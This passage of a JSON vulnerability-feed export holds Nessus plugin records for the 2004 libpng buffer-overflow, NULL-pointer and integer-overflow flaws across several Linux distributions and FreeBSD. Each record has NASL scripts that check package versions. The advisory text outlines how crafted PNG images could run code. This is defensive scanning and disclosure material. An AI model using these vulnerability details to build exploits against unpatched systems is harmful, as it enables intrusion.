([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"libpng-1.2.5-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng-debuginfo-1.2.5-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng-devel-1.2.5-7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng / libpng-debuginfo / libpng-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:15", "description": "New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program\ncrashes, or possibly allow arbitrary code embedded in a malicious PNG\nimage to execute. 
The PNG library is widely used within the system, so\nall sites should upgrade to the new libpng package.", "edition": 23, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : libpng (SSA:2004-222-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2005-07-13T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:libpng", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2004-222-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18781", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-222-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18781);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"SSA\", value:\"2004-222-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : libpng (SSA:2004-222-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program\ncrashes, or possibly allow arbitrary code embedded in a malicious PNG\nimage to execute. 
The PNG library is widely used within the system, so\nall sites should upgrade to the new libpng package.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.439243\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcef2652\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.218557\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?010ecf12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:15", "description": "New imagemagick packages are available for Slackware 9.1, 10.0, and\n-current to fix security issues with PNG images.", "edition": 21, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 9.1 / current : imagemagick (SSA:2004-223-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": 
"2005-07-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "p-cpe:/a:slackware:slackware_linux:imagemagick", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2004-223-02.NASL", "href": "https://www.tenable.com/plugins/nessus/18749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-223-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18749);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"SSA\", value:\"2004-223-02\");\n\n script_name(english:\"Slackware 10.0 / 9.1 / current : imagemagick (SSA:2004-223-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New imagemagick packages are available for Slackware 9.1, 10.0, and\n-current to fix security issues with PNG images.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.353817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64c7b9bf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"9.1\", pkgname:\"imagemagick\", pkgver:\"5.5.7_25\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"imagemagick\", pkgver:\"6.0.4_3\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"imagemagick\", pkgver:\"6.0.4_3\", 
pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:50", "description": "The remote host is affected by the vulnerability described in GLSA-200408-03\n(libpng: Numerous vulnerabilities)\n\n libpng contains numerous vulnerabilities including NULL pointer dereference\n errors and boundary errors in various functions.\n \nImpact :\n\n An attacker could exploit these vulnerabilities to cause programs linked\n against the library to crash or execute arbitrary code with the permissions\n of the user running the vulnerable program, which could be the root user.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version.", "edition": 24, "published": "2004-08-30T00:00:00", "title": "GLSA-200408-03 : libpng: Numerous vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libpng"], "id": "GENTOO_GLSA-200408-03.NASL", "href": "https://www.tenable.com/plugins/nessus/14559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200408-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14559);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"GLSA\", value:\"200408-03\");\n\n script_name(english:\"GLSA-200408-03 : libpng: Numerous vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200408-03\n(libpng: Numerous vulnerabilities)\n\n libpng contains numerous vulnerabilities including NULL pointer dereference\n errors and boundary errors in various functions.\n \nImpact :\n\n An attacker could exploit these vulnerabilities to cause programs linked\n against the library to crash or execute arbitrary code with the permissions\n of the user running the vulnerable program, which could be the root user.\n \nWorkaround :\n\n There is no known workaround at this time. 
All users are encouraged to\n upgrade to the latest available version.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200408-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libpng users should upgrade to the latest stable version:\n # emerge sync\n # emerge -pv '>=media-libs/libpng-1.2.5-r8'\n # emerge '>=media-libs/libpng-1.2.5-r8'\n You should also run revdep-rebuild to rebuild any packages that depend on\n older versions of libpng :\n # revdep-rebuild\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/libpng\", unaffected:make_list(\"ge 1.2.5-r8\"), vulnerable:make_list(\"le 1.2.5-r7\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:05:42", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-08-05T00:00:00", "title": "Fedora Core 2 : libpng-1.2.5-8 (2004-239)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-05T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:libpng-debuginfo", "p-cpe:/a:fedoraproject:fedora:libpng-devel", "p-cpe:/a:fedoraproject:fedora:libpng"], "id": "FEDORA_2004-239.NASL", "href": "https://www.tenable.com/plugins/nessus/14210", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-239.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14210);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-239\");\n\n script_name(english:\"Fedora Core 2 : libpng-1.2.5-8 (2004-239)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. 
An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000247.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70cb77cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng, libpng-debuginfo and / or libpng-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"libpng-1.2.5-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng-debuginfo-1.2.5-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng-devel-1.2.5-8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng / libpng-debuginfo / libpng-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:14:44", "description": "The remote host is missing the patch for the advisory \nSUSE-SA:2004:023 (libpng).\n\n\nSeveral different security vulnerabilities were found in the PNG\nlibrary which is used by applications to support the PNG image format.\n\nA remote attacker would be able to execute arbitrary code by triggering a\nbuffer overflow due to the incorrect handling of the length of\ntransparency chunk data and in other pathes of image processing.\n\nA special PNG image can be used to cause an application crashing due\nto NULL pointer dereference in the function png_handle_iCPP() (and\nother locations). \n\nInteger overflows were found in png_handle_sPLT(), png_read_png()\nfunctions and other locations. 
These bugs may at least crash an\napplication.", "edition": 22, "published": "2004-08-04T00:00:00", "title": "SUSE-SA:2004:023: libpng", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-04T00:00:00", "cpe": [], "id": "SUSE_SA_2004_023.NASL", "href": "https://www.tenable.com/plugins/nessus/14206", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:023\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(14206);\n script_version(\"1.12\");\n script_cve_id(\"CVE-2004-0597\",\"CVE-2004-0598\",\"CVE-2004-0599\");\n name[\"english\"] = \"SUSE-SA:2004:023: libpng\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory \nSUSE-SA:2004:023 (libpng).\n\n\nSeveral different security vulnerabilities were found in the PNG\nlibrary which is used by applications to support the PNG image format.\n\nA remote attacker would be able to execute arbitrary code by triggering a\nbuffer overflow due to the incorrect handling of the length of\ntransparency chunk data and in other pathes of image processing.\n\nA special PNG image can be used to cause an application crashing due\nto NULL pointer dereference in the function png_handle_iCPP() (and\nother locations). \n\nInteger overflows were found in png_handle_sPLT(), png_read_png()\nfunctions and other locations. 
These bugs may at least crash an\napplication.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_23_libpng.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/08/04\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the libpng package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"libpng-2.1.0.12-169\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.4-115\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.5-191\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.5-191\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.5-182.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:33", "description": "Chris Evans has discovered multiple vulnerabilities in libpng, which\ncan be exploited by malicious people to compromise a vulnerable 
system\nor cause a DoS (Denial of Service).", "edition": 26, "published": "2009-04-23T00:00:00", "title": "FreeBSD : libpng stack-based buffer overflow and other code concerns (f9e3e60b-e650-11d8-9b0a-000347a4fa7d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ko-netscape-communicator-linux", "p-cpe:/a:freebsd:freebsd:mozilla", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ja-netscape-navigator-linux", "p-cpe:/a:freebsd:freebsd:linux-netscape-navigator", "p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:png", "p-cpe:/a:freebsd:freebsd:ko-netscape-navigator-linux", "p-cpe:/a:freebsd:freebsd:netscape-communicator", "p-cpe:/a:freebsd:freebsd:pt_BR-netscape7", "p-cpe:/a:freebsd:freebsd:ja-netscape-communicator-linux", "p-cpe:/a:freebsd:freebsd:thunderbird", "p-cpe:/a:freebsd:freebsd:netscape7", "p-cpe:/a:freebsd:freebsd:de-netscape7", "p-cpe:/a:freebsd:freebsd:linux-mozilla", "p-cpe:/a:freebsd:freebsd:linux-png", "p-cpe:/a:freebsd:freebsd:linux-mozilla-devel", "p-cpe:/a:freebsd:freebsd:fr-netscape7", "p-cpe:/a:freebsd:freebsd:netscape-navigator", "p-cpe:/a:freebsd:freebsd:mozilla-gtk1", "p-cpe:/a:freebsd:freebsd:ja-netscape7", "p-cpe:/a:freebsd:freebsd:linux-netscape-communicator"], "id": "FREEBSD_PKG_F9E3E60BE65011D89B0A000347A4FA7D.NASL", "href": "https://www.tenable.com/plugins/nessus/36897", 